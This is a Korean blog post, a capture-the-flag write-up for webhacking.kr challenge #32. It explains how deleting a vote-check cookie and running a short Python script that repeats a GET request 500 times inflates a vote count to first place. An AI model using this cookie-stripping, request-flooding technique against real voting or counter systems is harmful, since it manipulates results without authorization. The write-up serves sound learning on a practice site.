Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
| 29 | 30 | 31 |
Tags
- Python
- burpsuit
- Fortran 90
- Qrcode
- 카이사르 암호
- webhacking
- overthewire
- Masonic Cipher
- 시저 암호
- base16
- cookie
- Javscript
- AVR
- base32
- Pigpen Cipher
- sql injection
- sha1
- assembly
- Linux
- Caesar Cipher
- 비즈네르 암호
- Mail Header injection
- BASE64
- php_extract
- vigenere cipher
- reversing
- Navajo alphabet
- aslr
- JavaScript
- Web Hacking
Archives
- Today
- Total
My Drive
webhacking #32 본문
webhacking #32.
랭킹과 이름 hit 이 쫙 나와있고, 아래로 내려보니 Join 버튼이 있다.
버튼을 클릭하니 Done창이 뜨며
내 아이디도 추가가 되었다.
이름을 클릭하니 hit 이 1증가 했다.
다시 누르니 no!
뭐로 구분하는 걸까 보니,
vote가 이미 되었다는 쿠키가 존재하는 듯 하다.
이 쿠키를 삭제하고 다시 눌러보니
역시 1이 더 증가했다. 100까지 증가시켜야 하는것 같은데 손으로 하긴 너무 노가다 작업이다;;;
파이썬 코드를 이용해 작업하였다.
import httplib
import urllib
headers = {
'Host':'webhacking.kr',
'Proxy-Connection':'keep-alive',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Referer':'http://webhacking.kr/challenge/codeing/code5.html',
'Accept-Encoding':'gzip,deflate,sdch',
'Accept-Language':'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'Accept-Charset':'windows-949,utf-8;q=0.7,*;q=0.3',
'Cookie':'st=1415762868; PHPSESSID=prrkdarcpltg8g18r5465a22g4'
}
conn = httplib.HTTPConnection('webhacking.kr')
for i in range(500):
conn.request('GET', '/challenge/codeing/code5.html?hit=websnot', '', headers)
response = conn.getresponse()
rsp = response.read()
conn.close()간단히 코드 설명을 하자면 header는 아래와 같이 버프수트에 나오는 그대로 추가하였고, cookie 값에서 vote_check만 없애주었다.
GET 방식으로 request를 여러번 날려주면, 어느순간 새로고침을 했을 때 페이지가 아래와 같이 나온다.
1등이 되어있다. ㅎㅎ
다시 새로 고침을 하면 클리어!
'writeup' 카테고리의 다른 글
| webhacking #23 (0) | 2014.11.13 |
|---|---|
| webhacking #33 (0) | 2014.11.12 |
| webhacking #31 (0) | 2014.11.12 |
| webhacking #20 (0) | 2014.11.12 |
| webhacking #27 (0) | 2014.11.11 |
'writeup' Related Articles
more
Comments